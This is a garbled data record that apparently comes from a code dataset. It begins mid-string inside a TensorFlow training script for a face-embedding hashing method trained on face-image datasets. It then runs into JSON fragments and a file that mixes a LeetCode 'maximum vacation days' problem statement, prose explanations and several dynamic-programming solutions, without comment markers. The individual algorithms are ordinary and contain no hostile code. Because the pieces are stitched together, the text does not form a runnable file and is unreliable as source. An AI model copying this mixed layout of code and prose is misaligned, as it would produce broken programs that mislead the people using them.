'fc3')\n h_k = tf.reshape(fc3, [-1, m, q])\n h_k = tf.nn.softmax(beta * h_k, axis=2)\n index_matrix = tf.range(1, q + 1, dtype=tf.float32)\n h = tf.reduce_sum(h_k * index_matrix, axis=2)\n h = tf.reshape(h, [-1, m])\n h_norm = tf.math.l2_normalize(h, axis=1)\n l = tf.one_hot(labels, class_num)\n l = tf.matmul(l, tf.transpose(l))\n l_float = tf.cast(l, tf.float32)\n l = tf.reshape(tf.clip_by_value(l_float, 0.0, 1.0), (-1, 1))\n label_int = tf.cast(tf.squeeze(l, 1), tf.int32)\n inner_prod = tf.reshape(tf.matmul(h_norm, tf.transpose(h_norm)), (-1, 1))\n cos_t = tf.clip_by_value(inner_prod, -1.0, 1.0 - 1e-06)\n theta = tf.math.acos(cos_t)\n sin_t = tf.math.sin(theta)\n cos_mt = tf.math.cos(theta + margin)\n sin_mt = tf.math.sin(theta + margin)\n logit = l * s * tf.concat([sin_t, cos_mt], 1) + (1 - l) * s * tf.concat([\n sin_mt, cos_t], 1)\n l_ij_logit = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=\n logit, labels=label_int)\n c_ij = tf.abs(tf.reduce_mean(h, axis=0) - (q + 1) / 2)\n l_ij = tf.reduce_mean(l_ij_logit)\n c_ij = tf.reduce_mean(c_ij)\n loss = l_ij + lam * c_ij\n gradient = tf.gradients(loss, sin_t)\n t_vars = tf.global_variables()\n train_vars = [var for var in t_vars if 'DIom' in var.name]\n opt_t = tf.train.MomentumOptimizer(learning_rate, momentum=0.9).minimize(\n loss, var_list=train_vars, global_step=global_step)\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n sess.run(iterator['train'].initializer)\n iteration = sess.run(global_step)\n t_opt = [opt_t, loss, l_ij, c_ij]\n start_time = time.time()\n while iteration != total_iteration:\n img, lbl = sess.run([image['train'], label['train']])\n train_dict = {embedding_tensor: img, labels: lbl}\n _, train_loss, loss_l, loss_c = sess.run(t_opt, feed_dict=\n train_dict)\n iteration += 1\n if iteration % 10000 == 0:\n dist_list = []\n label_list = []\n code_list = []\n while wrapper.samples_left > 0:\n imgs, lbls = wrapper.get_next_batch(100)\n imgs = np.reshape(imgs, [-1, 
512])\n eer_dict = {embedding_tensor: imgs}\n code, int_code = sess.run([h_norm, h], feed_dict=eer_dict)\n code = np.reshape(code, [-1, 2, m])\n distance = np.sum(np.prod(code, axis=1), axis=1)\n if dist_list == []:\n dist_list = distance\n label_list = lbls\n code_list = int_code\n else:\n dist_list = np.concatenate((dist_list, distance),\n axis=0)\n label_list = np.concatenate((label_list, lbls), axis=0)\n code_list = np.concatenate((code_list, int_code),\n axis=0)\n wrapper.samples_left = np.size(wrapper.labels, axis=0)\n wrapper.next_batch_pointer = 0\n fpr, tpr, threshold = roc_curve(label_list, dist_list,\n pos_label=1)\n fnr = 1 - tpr\n eer = fpr[np.nanargmin(np.absolute(fnr - fpr))]\n code_arr = np.around(code_list)\n count_arr = []\n for i in range(q):\n count_arr.append(np.count_nonzero(code_arr == i + 1))\n plt.clf()\n plt.bar(range(1, q + 1), count_arr)\n plt.savefig('./plt/code_' + str(iteration) + '.png')\n time_taken = time.time() - start_time\n MAP = 0\n print(\n '[Iteration %d] Train Loss: %.4f, Loss_l: %.4f, Loss_c: %.4f, MAP: %.4f, EER: %.4f, Taken time: %.4f'\n % (iteration, train_loss, loss_l, loss_c, MAP, eer,\n time_taken))\n start_time = time.time()\n",
"step-4": "import tensorflow as tf\nimport numpy as np\nimport time\nimport os\nfrom sklearn.metrics import roc_curve\nimport matplotlib.pyplot as plt\n\n\nfrom src.model import get_args\nfrom src.funcs import linear\nfrom src.youtubeface import load_ytf_data\nfrom src.lfw import load_lfw_data\nfrom src.facescrub import load_fs_data\nfrom src.wrapper_basicImg import wrapper_basicImg\n\n\n\n\nif __name__ == '__main__':\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = '0'\n total_iteration = 300000\n m = 512\n q = 32\n lam = 0.01\n beta = 1.\n margin = 0.5\n s = 32\n batch_size = 256\n class_num = 1595\n train_dataset = 'FS'\n eval_dataset = \"LFW\"\n args = get_args()\n\n ### Get image and label from tfrecord\n image, label, iterator = {}, {}, {}\n if train_dataset == 'YTF':\n image['train'], label['train'], iterator['train'] = load_ytf_data(batch_size, 'train')\n\n elif train_dataset == 'FS':\n image['train'], label['train'], iterator['train'] = load_fs_data(batch_size, 'train')\n\n else:\n print(\"Select proper dataset\")\n\n ### Get evaluation dataset. 
Wrapper\n wrapper = wrapper_basicImg(dataset=eval_dataset)\n if eval_dataset == 'YTF':\n image['gallery'], label['gallery'], iterator['gallery'] = load_ytf_data(batch_size, 'train', eval=True)\n image['test'], label['test'], iterator['test'] = load_ytf_data(batch_size, 'test')\n\n elif eval_dataset == 'LFW':\n image['gallery'], label['gallery'], iterator['gallery'] = load_lfw_data(batch_size, 'gallery')\n image['test'], label['test'], iterator['test'] = load_lfw_data(batch_size, 'probe')\n\n\n ### Backbone network (Arcface)\n embedding_tensor = tf.placeholder(name='img_inputs', shape=[None, 512], dtype=tf.float32)\n labels = tf.placeholder(name='label', shape=[None, ], dtype=tf.int32)\n\n ### Global step & learning rate\n global_step = tf.Variable(0, trainable=False)\n starter_learning_rate = 0.003\n learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step, total_iteration, 0.96)\n\n ### My implementation (DIom algorithm)\n with tf.variable_scope('DIom'):\n fc1 = linear(tf.nn.relu(embedding_tensor), 1024, 'fc1')\n fc2 = linear(tf.nn.relu(fc1), 1024, 'fc2')\n fc3 = linear(tf.nn.relu(fc2), m * q, 'fc3')\n\n h_k = tf.reshape(fc3, [-1, m, q])\n h_k = tf.nn.softmax(beta * h_k, axis=2)\n\n index_matrix = tf.range(1, q + 1, dtype=tf.float32)\n h = tf.reduce_sum(h_k * index_matrix, axis=2)\n h = tf.reshape(h, [-1, m])\n h_norm = tf.math.l2_normalize(h, axis=1)\n\n ### Loss function\n l = tf.one_hot(labels, class_num)\n l = tf.matmul(l, tf.transpose(l))\n l_float = tf.cast(l, tf.float32)\n l = tf.reshape(tf.clip_by_value(l_float, 0., 1.), (-1, 1))\n label_int = tf.cast(tf.squeeze(l, 1), tf.int32)\n\n inner_prod = tf.reshape(tf.matmul(h_norm, tf.transpose(h_norm)), (-1, 1))\n cos_t = tf.clip_by_value(inner_prod, -1., 1. 
- 1e-6)\n theta = tf.math.acos(cos_t)\n\n sin_t = tf.math.sin(theta)\n cos_mt = tf.math.cos(theta + margin)\n sin_mt = tf.math.sin(theta + margin)\n\n logit = l * s * (tf.concat([sin_t, cos_mt], 1)) + (1 - l) * s * (tf.concat([sin_mt, cos_t], 1))\n\n l_ij_logit = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logit, labels=label_int)\n c_ij = tf.abs(tf.reduce_mean(h, axis=0) - (q + 1) / 2)\n\n # Baseline pairwise-CE\n # label_ce = tf.cast(labels, tf.float32)\n # l_ij = l * tf.log(tf.square(inner_prod)) + (1 - l) * tf.log(tf.maximum(1e-6, 1 - tf.square(inner_prod)))\n # l_ij = -tf.reduce_mean(l_ij)\n\n # My novel cosine loss\n l_ij = tf.reduce_mean(l_ij_logit)\n c_ij = tf.reduce_mean(c_ij)\n\n loss = l_ij + lam * c_ij\n\n gradient = tf.gradients(loss, sin_t)\n\n ### Optimizer\n t_vars = tf.global_variables()\n train_vars = [var for var in t_vars if 'DIom' in var.name]\n\n\n opt_t = tf.train.MomentumOptimizer(learning_rate, momentum=0.9).minimize(loss, var_list=train_vars, global_step=global_step)\n\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n sess.run(iterator['train'].initializer)\n\n ### Training\n iteration = sess.run(global_step)\n t_opt = [opt_t, loss, l_ij, c_ij]\n start_time = time.time()\n while iteration != total_iteration:\n img, lbl = sess.run([image['train'], label['train']])\n\n train_dict = {\n embedding_tensor: img,\n labels: lbl\n }\n\n _, train_loss, loss_l, loss_c = sess.run(t_opt, feed_dict=train_dict)\n iteration += 1\n\n if iteration % 10000 == 0:\n ### Evaluation after training\n ### Get gallery hash code\n # gallery = []\n # gallery_label = []\n # sess.run(iterator['gallery'].initializer)\n # try:\n # while True:\n # img, lbl = sess.run([image['gallery'], label['gallery']])\n #\n # gallery_dict = {\n # embedding_tensor: img\n # }\n #\n # hash_code = sess.run(h_norm, feed_dict=gallery_dict)\n #\n # if gallery == []:\n # gallery = hash_code\n # gallery_label = lbl\n # else:\n # gallery = 
np.concatenate((gallery, hash_code), axis=0)\n # gallery_label = np.concatenate((gallery_label, lbl), axis=0)\n #\n # except tf.errors.OutOfRangeError:\n # pass\n #\n # ### Get probe hash code\n # probe = []\n # probe_label = []\n # code_arr = []\n # sess.run(iterator['test'].initializer)\n # try:\n # while True:\n # img, lbl = sess.run([image['test'], label['test']])\n #\n # gallery_dict = {\n # embedding_tensor: img\n # }\n #\n # code, hash_code = sess.run([h, h_norm], feed_dict=gallery_dict)\n #\n # if probe == []:\n # probe = hash_code\n # probe_label = lbl\n # code_arr = code\n # else:\n # probe = np.concatenate((probe, hash_code), axis=0)\n # probe_label = np.concatenate((probe_label, lbl), axis=0)\n # code_arr = np.concatenate((code_arr, code), axis=0)\n #\n # except tf.errors.OutOfRangeError:\n # pass\n #\n # ### Code frequency\n # code_arr = np.around(code_arr)\n # count_arr = []\n # for i in range(q):\n # count_arr.append(np.count_nonzero(code_arr == i + 1))\n #\n # plt.clf()\n # plt.bar(range(1, q+1), count_arr)\n # plt.savefig('./plt/code_' + str(iteration) + '.png')\n\n # ### Calculate MAP\n # gtp = 40\n # k = 50\n #\n # distance = np.matmul(probe, gallery.T)\n # arg_idx = np.argsort(-distance, axis=1)\n #\n # max_label = gallery_label[arg_idx[:, :k]]\n # match_matrix = np.equal(max_label, probe_label[:,np.newaxis])\n #\n # tp_seen = match_matrix * np.cumsum(match_matrix, axis=1)\n # ap = np.sum(tp_seen / np.arange(1, k + 1)[np.newaxis, :], axis=1) / gtp\n # MAP = np.mean(ap)\n\n ### Calculate EER\n dist_list = []\n label_list = []\n code_list = []\n while wrapper.samples_left > 0:\n imgs, lbls = wrapper.get_next_batch(100)\n\n imgs = np.reshape(imgs, [-1, 512])\n\n eer_dict = {\n embedding_tensor: imgs\n }\n\n code, int_code = sess.run([h_norm, h], feed_dict=eer_dict)\n code = np.reshape(code, [-1, 2, m])\n\n distance = np.sum(np.prod(code, axis=1), axis=1)\n\n if dist_list == []:\n dist_list = distance\n label_list = lbls\n code_list = int_code\n\n 
else:\n dist_list = np.concatenate((dist_list, distance), axis=0)\n label_list = np.concatenate((label_list, lbls), axis=0)\n code_list = np.concatenate((code_list, int_code), axis=0)\n\n wrapper.samples_left= np.size(wrapper.labels, axis=0)\n wrapper.next_batch_pointer = 0\n\n fpr, tpr, threshold = roc_curve(label_list, dist_list, pos_label=1)\n fnr = 1 - tpr\n # eer_threshold = threshold(np.nanargmin(np.absolute((fnr - fpr))))\n eer = fpr[np.nanargmin(np.absolute((fnr - fpr)))]\n\n ### Code frequency\n code_arr = np.around(code_list)\n count_arr = []\n for i in range(q):\n count_arr.append(np.count_nonzero(code_arr == i + 1))\n\n plt.clf()\n plt.bar(range(1, q + 1), count_arr)\n plt.savefig('./plt/code_' + str(iteration) + '.png')\n\n time_taken = time.time() - start_time\n MAP = 0\n # print(\"good\")\n print(\"[Iteration %d] Train Loss: %.4f, Loss_l: %.4f, Loss_c: %.4f, MAP: %.4f, EER: %.4f, Taken time: %.4f\"\n % (iteration, train_loss, loss_l, loss_c, MAP, eer, time_taken))\n\n start_time = time.time()\n\n # np.save('CP.npy', np.concatenate((fpr[np.newaxis, :], tpr[np.newaxis, :]), axis=0))\n ### Save model.\n # save_vars = [var for var in t_vars if 'DIom' in var.name]\n # saver = tf.train.Saver(var_list=save_vars)\n # saver.save(sess, './model/DIom_layer')",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
'''
LeetCode wants to give one of its best employees the option to travel among n cities to collect algorithm problems. But all work and no play makes Jack a dull boy, you could take vacations in some particular cities and weeks. Your job is to schedule the traveling to maximize the number of vacation days you could take, but there are certain rules and restrictions you need to follow.
Rules and restrictions:
You can only travel among n cities, represented by indexes from 0 to n - 1. Initially, you are in the city indexed 0 on Monday.
The cities are connected by flights. The flights are represented as an n x n matrix (not necessarily symmetrical), called flights representing the airline status from the city i to the city j. If there is no flight from the city i to the city j, flights[i][j] == 0; Otherwise, flights[i][j] == 1. Also, flights[i][i] == 0 for all i.
You totally have k weeks (each week has seven days) to travel. You can only take flights at most once per day and can only take flights on each week's Monday morning. Since flight time is so short, we do not consider the impact of flight time.
For each city, you can only have restricted vacation days in different weeks, given an n x k matrix called days representing this relationship. For the value of days[i][j], it represents the maximum days you could take a vacation in the city i in the week j.
You could stay in a city beyond the number of vacation days, but you should work on the extra days, which will not be counted as vacation days.
If you fly from city A to city B and take the vacation on that day, the deduction towards vacation days will count towards the vacation days of city B in that week.
We do not consider the impact of flight hours on the calculation of vacation days.
Given the two matrices flights and days, return the maximum vacation days you could take during k weeks.
'''
First convert flights to a graph represented by adjacency lists. An edge exists between two cities if there is a flight connecting them. And also include the source city in destination list since we can stay at the source city.
Then dp[week][city] recurrence: dp[w][c] = days[c][w] + max(dp[w+1][dest] for dest in g[c]).
It's easier to use bottom up here since the starting point (week 0) is fixed instead of ending point. Using bottom up, we can get the maximum value for week 0 in our dp table.
Eventually since we start at city 0, answer is the max days from city 0's destinations (in day 0, you can spend rest days of week 0 in city 0 or other cities connected to city 0)
def maxVacationDays(flights, days):
    """Return the maximum total vacation days over k weeks, starting in city 0.

    flights[i][j] == 1 means a Monday flight from city i to city j exists;
    days[i][w] is the vacation allowance for staying in city i during week w.
    """
    num_cities, num_weeks = len(days), len(days[0])
    # Adjacency lists: every city can always "fly" to itself (i.e. stay put).
    reachable = []
    for src, row in enumerate(flights):
        dests = [dst for dst, has_flight in enumerate(row) if has_flight]
        dests.append(src)
        reachable.append(dests)
    # dp[w][c]: best vacation total from week w onward, spending week w in city c.
    # Row num_weeks is an all-zero sentinel giving the last real week a base case.
    dp = [[0] * num_cities for _ in range(num_weeks + 1)]
    for week in reversed(range(num_weeks)):
        for city in range(num_cities):
            best_next = max(dp[week + 1][dst] for dst in reachable[city])
            dp[week][city] = days[city][week] + best_next
    # We wake up in city 0 on the first Monday, so week 0 may be spent in
    # city 0 itself or in any city directly reachable from it.
    return max(dp[0][dst] for dst in reachable[0])
-------------------------------------------------------------------------
Intuition:
We can tell this is a DP problem since subproblems of our original problem will overlap. For example, in some week i, we could be able to fly to some city j from multiple other cities, depending on whether there are valid flights or not.
We'll use what city we are in, and what week it is as our state values. So, dp(week, city) will tell us the maximum vacation time from this city and week.
Our base case will be if the week is past k, in which case we return 0.
Our recurrence relation will consider traveling to every possible city that we can fly to, and also consider not traveling at all. For each place we travel to, we can calculate the value of staying there as days[city][week], plus dp(week + 1, city), where city is our destination after traveling (or not traveling).
Then, we just need to solve for dp(0,0).
Code:
def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:
    """Top-down DP: dp(week, city) is the best vacation total from `week`
    onward, given that week is spent in `city`; the answer is dp(0, 0)."""
    total_weeks = len(days[0])
    memo = {}

    def dp(week, city):
        if week == total_weeks:           # no weeks left to spend
            return 0
        if (week, city) in memo:
            return memo[(week, city)]
        # Option 1: stay where we are for this week.
        best = days[city][week] + dp(week + 1, city)
        # Option 2: fly to any directly connected city instead.
        for dest in range(len(flights[0])):
            if flights[city][dest]:
                best = max(best, days[dest][week] + dp(week + 1, dest))
        memo[(week, city)] = best
        return best

    return dp(0, 0)
Analysis:
O(n^2 * k) time, from n * k state values to calculate, times n time to calculate each state.
O(n * k) space, since we have n * k states to memoize.
----------------------------------------------------------------------------------------------------
Viterbi Algorithm
# Find the longest path on a Week (Row) x City (Col) Table
def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:
    """Forward (Viterbi-style) DP over a weeks x cities table.

    dp[w][c] holds the best vacation total after weeks 0..w with week w
    spent in city c, or -inf if city c is unreachable by week w.
    """
    num_cities, num_weeks = len(days), len(days[0])
    NEG_INF = float('-inf')
    dp = [[NEG_INF] * num_cities for _ in range(num_weeks)]
    # Week 0: we start in city 0, so we may stay there or take one flight out.
    dp[0][0] = days[0][0]
    for dest in range(1, num_cities):
        if flights[0][dest] == 1:
            dp[0][dest] = days[dest][0]
    # Subsequent weeks: relax every flight edge plus the "stay" self-loops.
    for week in range(1, num_weeks):
        for src in range(num_cities):
            for dest, has_flight in enumerate(flights[src]):
                if has_flight or src == dest:
                    candidate = dp[week - 1][src] + days[dest][week]
                    if candidate > dp[week][dest]:
                        dp[week][dest] = candidate
    return max(dp[-1])
-------------------------------------------------------------------------------------------------------------
We consider each city of each day as node. Thus, there are N * k + 2 nodes including the dummy start node and the dummy end node. We connect each node if there is a flight, or if they are the same city. (It means that he just stays at the same city.) After connecting all the possible edges, I performed BFS starting from the dummy start node to find the longest path to all the nodes. The answer is the longest path from the start node to the end node.
Note that in this problem, we are considering the maximum value, so it's not shortest path but longest path.
class Graph:
    """Weighted digraph supporting a longest-path relaxation from a source.

    Distances start at -inf and are raised by repeated edge relaxation
    (label-correcting). This terminates here because the week-layered graph
    it is used on is a DAG — no positive cycles exist to relax forever.
    """

    def __init__(self, num):
        self.V = num                            # number of nodes
        self.edges = [[] for _ in range(num)]   # adjacency: node -> [node, weight] pairs
        self.dists = [-math.inf] * num          # best-known distance per node

    def add_edge(self, a, b, w):
        """Add a directed edge a -> b with weight w."""
        self.edges[a].append([b, w])

    def bfs(self, start):
        """Relax edges outward from `start`; return the distance to the last node."""
        self.dists[start] = 0
        pending = deque([start])
        while pending:
            node = pending.popleft()
            for neighbor, weight in self.edges[node]:
                candidate = self.dists[node] + weight
                if candidate > self.dists[neighbor]:
                    self.dists[neighbor] = candidate
                    pending.append(neighbor)
        return self.dists[-1]
class Solution:
    """Model the schedule as a layered DAG and find its longest path.

    Node N*w + c represents "spend week w in city c"; two dummy nodes
    (index N*k = start, N*k + 1 = end) bracket the k week layers.
    """

    def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:
        N, k = len(flights), len(days[0])
        g = Graph(N * k + 2)
        source, sink = N * k, N * k + 1
        # Start -> week 0: we begin in city 0, or fly anywhere reachable from it.
        for city in range(N):
            if city == 0 or flights[0][city]:
                g.add_edge(source, city, days[city][0])
        # Week w-1 -> week w: stay put or take a direct flight.
        for w in range(1, k):
            for src in range(N):
                for dst in range(N):
                    if src == dst or flights[src][dst] == 1:
                        g.add_edge(N * (w - 1) + src, N * w + dst, days[dst][w])
        # Last week -> end: zero-weight edges so the final distance is the answer.
        for city in range(N):
            g.add_edge(N * (k - 1) + city, sink, 0)
        return g.bfs(start=source)
-------------------------------------------------------------------------------------------------------
Let's maintain best[i], the most vacation days you can have ending in city i on week t. At the end, we simply want max(best), the best answer for any ending city.
For every flight i -> j (including staying in the same city, when i == j), we have a candidate answer best[j] = best[i] + days[j][t], and we want the best answer of those.
When the graph is sparse, we can precompute flights_available[i] = [j for j, adj in enumerate(flights[i]) if adj or i == j] instead to save some time, but this is not required.
def maxVacationDays(self, flights, days):
    """Rolling-array forward DP.

    best[i] is the most vacation days achievable with the current week spent
    in city i (-inf while city i is still unreachable).

    Fix: replaced Python 2's `xrange` with `range` so this runs under
    Python 3 like the rest of the file; also skip relaxation from
    unreachable cities, which is a free no-op elimination.

    Args:
        flights: n x n 0/1 matrix; flights[i][j] == 1 means flight i -> j exists.
        days:    n x k matrix of vacation allowances per city per week.
    Returns:
        Maximum total vacation days over the k weeks, starting in city 0.
    """
    NINF = float('-inf')
    N, K = len(days), len(days[0])
    best = [NINF] * N
    best[0] = 0                      # we start week 0's Monday in city 0
    for t in range(K):
        cur = [NINF] * N
        for i in range(N):
            if best[i] == NINF:      # city i unreachable: nothing to relax
                continue
            for j, adj in enumerate(flights[i]):
                if adj or i == j:    # take the flight, or stay in city i
                    cur[j] = max(cur[j], best[i] + days[j][t])
        best = cur
    return max(best)
--------------------------------------------------------------------------------------
Thought process
Recursive backtracking
def backtrack(week, city):
backtrack(week, city) = max(stay: days[city][week] + backtrack(week+1, city), fly: max(backtrack(week+1, other) + days[other][week]) for flights[city][other] == 1)
flights can be optimized using adjacency list
base case: week == N, return 0
because there is no state change, we can use memoization
be careful that even if you work in a city all week, staying there can still provide more opportunities for vacation in the future (because maybe you can only fly to another city and cannot come back, but future weeks in this city may have many vacation days)
just try everything possible!
Iterative solution is also simple
Top-down DP
import functools
class Solution:
    """Memoized recursion over (week, city) states."""

    def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:
        num_cities, num_weeks = len(days), len(days[0])
        # Pre-compute adjacency lists so each state only scans real flights.
        neighbors = []
        for row in flights:
            neighbors.append([dest for dest, can_fly in enumerate(row) if can_fly])

        @functools.lru_cache(None)
        def solve(week, city):
            """Best vacation total from `week` onward, spending it in `city`."""
            if week == num_weeks:
                return 0
            # Either remain in the current city for this week...
            best = days[city][week] + solve(week + 1, city)
            # ...or fly out along any available route first.
            for other in neighbors[city]:
                best = max(best, days[other][week] + solve(week + 1, other))
            return best

        return solve(0, 0)
Bottom-up DP
def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:
    """Bottom-up tabulation: dp[week][city] is the best vacation total from
    `week` onward when that week is spent in `city`; the answer is dp[0][0]."""
    num_cities, num_weeks = len(days), len(days[0])
    adjacency = [[dest for dest, can_fly in enumerate(row) if can_fly]
                 for row in flights]
    # Extra all-zero row gives the final week a base case.
    dp = [[0] * num_cities for _ in range(num_weeks + 1)]
    for week in reversed(range(num_weeks)):
        for city in range(num_cities):
            # Spend the week here without flying...
            stay_value = days[city][week] + dp[week + 1][city]
            # ...or fly to a connected city first (0 when no flights exist).
            fly_options = [days[other][week] + dp[week + 1][other]
                           for other in adjacency[city]]
            fly_value = max(fly_options) if fly_options else 0
            dp[week][city] = max(stay_value, fly_value)
    return dp[0][0]
O(K) space optimization
def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:
    """Same backward DP as the full-table version, but keeps only one O(N)
    row: `nxt` holds week+1's values while the current week's row is built."""
    num_cities, num_weeks = len(days), len(days[0])
    adjacency = [[dest for dest, can_fly in enumerate(row) if can_fly]
                 for row in flights]
    nxt = [0] * num_cities            # dp row for week `week + 1`
    for week in reversed(range(num_weeks)):
        row = []
        for city in range(num_cities):
            stay = days[city][week] + nxt[city]
            options = [days[other][week] + nxt[other] for other in adjacency[city]]
            fly = max(options) if options else 0
            row.append(max(stay, fly))
        nxt = row
    return nxt[0]
--------------------------------------------------------------------------------
class Solution:
    """Week-by-week best-first search.

    The heap stores (-vacation_so_far, city). Each week we pop states in
    best-first order; the first time a city is reached that week it receives
    its optimal running total, so at most n entries survive per week.
    """

    def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:
        n = len(flights)
        # reachable[i]: city i itself (staying put) plus every direct destination.
        reachable = collections.defaultdict(list)
        for src in range(n):
            reachable[src].append(src)
            reachable[src].extend(dst for dst in range(n) if flights[src][dst])
        num_weeks = len(days[0])
        frontier = [(0, 0)]                      # (-vacation days, city); start in city 0
        for week in range(num_weeks):
            seen = set()
            next_frontier = []
            while len(next_frontier) < n and frontier:
                neg_vac, city = heapq.heappop(frontier)
                for dest in reachable[city]:
                    if dest not in seen:
                        seen.add(dest)
                        heapq.heappush(next_frontier, (neg_vac - days[dest][week], dest))
            frontier = next_frontier
        neg_vac, _ = heapq.heappop(frontier)
        return -neg_vac
|
normal
|
{
"blob_id": "aa7cf08b40b2a13e39003f95e5e0ce7335cbdba2",
"index": 1766,
"step-1": "'''\nLeetCode wants to give one of its best employees the option to travel among n cities to collect algorithm problems. But all work and no play makes Jack a dull boy, you could take vacations in some particular cities and weeks. Your job is to schedule the traveling to maximize the number of vacation days you could take, but there are certain rules and restrictions you need to follow.\n\nRules and restrictions:\n\nYou can only travel among n cities, represented by indexes from 0 to n - 1. Initially, you are in the city indexed 0 on Monday.\nThe cities are connected by flights. The flights are represented as an n x n matrix (not necessarily symmetrical), called flights representing the airline status from the city i to the city j. If there is no flight from the city i to the city j, flights[i][j] == 0; Otherwise, flights[i][j] == 1. Also, flights[i][i] == 0 for all i.\nYou totally have k weeks (each week has seven days) to travel. You can only take flights at most once per day and can only take flights on each week's Monday morning. Since flight time is so short, we do not consider the impact of flight time.\nFor each city, you can only have restricted vacation days in different weeks, given an n x k matrix called days representing this relationship. For the value of days[i][j], it represents the maximum days you could take a vacation in the city i in the week j.\nYou could stay in a city beyond the number of vacation days, but you should work on the extra days, which will not be counted as vacation days.\nIf you fly from city A to city B and take the vacation on that day, the deduction towards vacation days will count towards the vacation days of city B in that week.\nWe do not consider the impact of flight hours on the calculation of vacation days.\nGiven the two matrices flights and days, return the maximum vacation days you could take during k weeks.\n'''\n\n\nFirst convert flights to a graph represented by adjacency lists. 
An edge exists between two cities if there is a flight connecting them. And also include the source city in destination list since we can stay at the source city.\n\nThen dp[week][city] recurrence: dp[w][c] = days[c][w] + max(dp[w+1][dest] for dest in g[c]).\nIt's easier to use bottom up here since the starting point (week 0) is fixed instead of ending point. Using bottom up, we can get the maximum value for week 0 in our dp table.\n\nEventually since we start at city 0, answer is the max days from city 0's destinations (in day 0, you can spend rest days of week 0 in city 0 or other cities connected to city 0)\n\ndef maxVacationDays(flights, days):\n\tn, k = len(days), len(days[0])\n\tg = [[j for j, dst in enumerate(city) if dst]+[i] for i, city in enumerate(flights)]\n\tdp = [[0] * n for _ in range(k+1)]\n\tfor w in range(k)[::-1]:\n\t\tfor c in range(n):\n\t\t\tdp[w][c] = days[c][w] + max(dp[w+1][dst] for dst in g[c])\n\treturn max(dp[0][dst] for dst in g[0])\n\n\n-------------------------------------------------------------------------\nIntuition:\nWe can tell this is a DP problem since subproblems of our original problem will overlap. For example, in some week i, we could be able to fly to some city j from multiple other cities, depending on if there valid flights or not.\n\nWe'll use what city we are in, and what week it is as our state values. So, dp(week, city) will tell us the maximum vacation time from this city and week.\n\nOur base case will be if the week is past k, in which case we return 0.\n\nOur recurrance relation will consider traveling to every possible city that we can fly to, and also consider not traveling at all. 
For each place we travel to, we can calculate the value of staying there as days[city][week], plus dp(week + 1, city), where city is our destination after traveling (or not traveling).\n\nThen, we just need to solve for dp(0,0).\n\nCode:\n\ndef maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:\n\tk = len(days[0])\n\t\n\t@lru_cache(None)\n\tdef dp(week, city):\n\t # we are past the amount of weeks we are traveling for\n\t\tif week == k:\n\t\t\treturn 0 \n\t\t\t\n\t\t# consider not traveling (notice city is our original city)\n\t\tbest = days[city][week] + dp(week + 1, city)\n\t\t\n\t\tfor j in range(len(flights[0])):\n\t\t\tif flights[city][j] == 0:\n\t\t\t\t# if we can't travel to this city, skip it\n\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t# consider traveling to city j as the answer\n\t\t\tbest = max(best, days[j][week] + dp(week + 1, j))\n\t\t\t\n\t\t# return the maximal value of all possibilities\n\t\treturn best\n\treturn dp(0,0)\nAnalysis:\n\nO(n^2 * k) time from n * k states values to calulate, times n time to calculate each state.\nO(n * k) space, since we have n * k states to memoize.\n\n\n----------------------------------------------------------------------------------------------------\nViterbi Algorithm\n # Find the longest path on a Week (Row) x City (Col) Table\n\ndef maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:\n \n n, k = len(days), len(days[0]) # days: city x week\n \n dp = [[float('-inf')] * n for _ in range(k)] # dp: week x city \n \n dp[0][0] = days[0][0] \n for d in range(1, n): # week 0 can be any city having a flight\n if flights[0][d] == 1: dp[0][d] = days[d][0]\n\n for t in range(1, k):\n for c in range(n):\n for d, hasflight in enumerate(flights[c]):\n if hasflight or c == d:\n dp[t][d] = max(dp[t][d], dp[t-1][c] + days[d][t])\n\n return max(dp[-1])\n \n -------------------------------------------------------------------------------------------------------------\n We consider each 
city of each day as node. Thus, there are N * k + 2 nodes including the dummy start node and the dummy end node. We connect each node if there is a flight, or if they are the same city. (It means that he just stays at the same city.) After connecting all the possible edges, I performed BFS starting from the dummy start node to find the longest path to all the nodes. The answer is the longest path from the start node to the end node.\n\nNote that in this problem, we are considering the maximum value, so it's not shortest path but longest path.\n\nclass Graph:\n def __init__(self, num):\n self.V = num\n self.edges = [[] for _ in range(num)]\n self.dists = [-math.inf for _ in range(num)]\n \n def add_edge(self, a, b, w):\n self.edges[a].append([b, w])\n \n def bfs(self, start):\n queue = deque([start])\n self.dists[start] = 0\n \n while queue:\n u = queue.popleft()\n for ad, dist in self.edges[u]:\n new_dist = self.dists[u] + dist\n if new_dist > self.dists[ad]:\n self.dists[ad] = new_dist\n queue.append(ad)\n return self.dists[-1]\n \nclass Solution:\n def maxVacationDays(self, flights: List[List[int]], days: List[List[int]]) -> int:\n N, k = len(flights), len(days[0])\n #construct graph\n g = Graph(N * k + 2)\n for i in range(N): #first day\n if i == 0 or flights[0][i]:\n g.add_edge(N * k, i, days[i][0])\n for d in range(1, k): #middle days\n for i in range(N):\n for j in range(N):\n if i == j or flights[i][j] == 1:\n g.add_edge(N * (d - 1) + i, N * d + j, days[j][d])\n for i in range(N): #final day\n g.add_edge(N * (k - 1) + i, N * k + 1, 0)\n \n return g.bfs(start=N * k)\n-------------------------------------------------------------------------------------------------------\nLet's maintain best[i], the most vacation days you can have ending in city i on week t. 
